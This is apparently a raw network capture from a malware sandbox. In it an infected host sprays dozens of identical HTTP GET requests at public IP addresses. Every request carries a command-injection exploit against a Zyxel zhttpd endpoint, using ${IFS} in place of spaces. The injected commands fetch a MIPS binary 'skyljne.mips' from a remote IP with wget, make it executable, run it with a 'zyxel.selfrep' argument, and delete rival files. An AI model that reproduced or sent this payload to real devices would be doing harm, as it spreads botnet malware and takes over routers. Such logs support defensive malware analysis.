                                        Jan 14, 2024 16:18:44.447882891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4163192.168.2.1334828131.101.153.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.447943926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4164192.168.2.134608419.167.82.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.447999001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4165192.168.2.1337652172.242.169.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.448055029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4166192.168.2.1348838185.11.239.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.448108912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4167192.168.2.1360546139.93.111.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.448172092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4168192.168.2.1342842152.226.133.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.448219061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4169192.168.2.1359802125.4.156.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.448287964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4170192.168.2.1347070102.255.134.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.448360920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4171192.168.2.135447279.206.52.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.448400974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4172192.168.2.136027295.143.228.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.448438883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4173192.168.2.1337018193.151.123.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.448524952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4174192.168.2.1340576174.18.13.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.448596954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4175192.168.2.133452837.23.120.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.448653936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4176192.168.2.134774459.191.171.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.448689938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4177192.168.2.134865074.96.176.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.448750019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4178192.168.2.133412085.241.214.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.448782921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4179192.168.2.1350538149.219.224.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.448854923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4180192.168.2.1345574149.40.175.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.448892117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4181192.168.2.1353916150.211.108.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.448970079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4182192.168.2.1359622140.240.52.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.449023962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4183192.168.2.1357808187.21.11.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.449075937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4184192.168.2.1350532125.156.145.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.449126959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4185192.168.2.133854667.228.178.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.449196100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4186192.168.2.1352752135.240.206.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.449250937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4187192.168.2.1347340106.144.161.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.449287891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4188192.168.2.1354548156.154.245.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.449336052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4189192.168.2.1354238183.74.217.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.449392080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4190192.168.2.135513860.211.134.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.449465990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4191192.168.2.1345128138.200.20.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.449528933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4192192.168.2.1333702136.210.154.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.449589014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4193192.168.2.133345291.131.198.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.449650049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4194192.168.2.1344488203.29.181.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.449718952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4195192.168.2.1344962157.225.49.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.449747086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4196192.168.2.135304093.184.243.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.449815989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4197192.168.2.1340696201.94.100.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.449857950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4198192.168.2.1348602124.204.44.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.449902058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4199192.168.2.134224034.219.122.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.449945927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4200192.168.2.135356671.92.113.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.450023890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4201192.168.2.135688266.65.24.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.450071096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4202192.168.2.133965495.175.192.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.450114965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4203192.168.2.134153819.129.18.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.450154066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4204192.168.2.1357520136.140.189.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.450221062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4205192.168.2.1357344144.120.34.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.450273991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4206192.168.2.134477898.62.31.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.450323105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4207192.168.2.1335646155.35.160.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.450371027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4208192.168.2.135715049.150.91.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.450454950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4209192.168.2.135692471.202.122.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.450491905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4210192.168.2.1339184148.140.133.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.450557947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4211192.168.2.133539682.41.192.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.450625896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4212192.168.2.1360184165.21.101.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.450679064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4213192.168.2.133391035.20.13.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.450730085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4214192.168.2.1338004122.230.65.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.450793028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4215192.168.2.133318019.206.89.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.450819016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4216192.168.2.1350536129.123.181.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.450874090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4217192.168.2.1336664106.210.4.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.450921059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4218192.168.2.135712418.17.183.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.450992107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4219192.168.2.1350256106.236.224.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.451061964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4220192.168.2.134840878.73.139.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.451116085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4221192.168.2.134999041.18.178.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.451169968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4222192.168.2.135072652.211.239.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.451221943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4223192.168.2.1342704180.168.193.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.451288939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4224192.168.2.135131282.209.55.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:44.451339960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4225192.168.2.1338202191.47.203.186443
                                        TimestampBytes transferredDirectionData
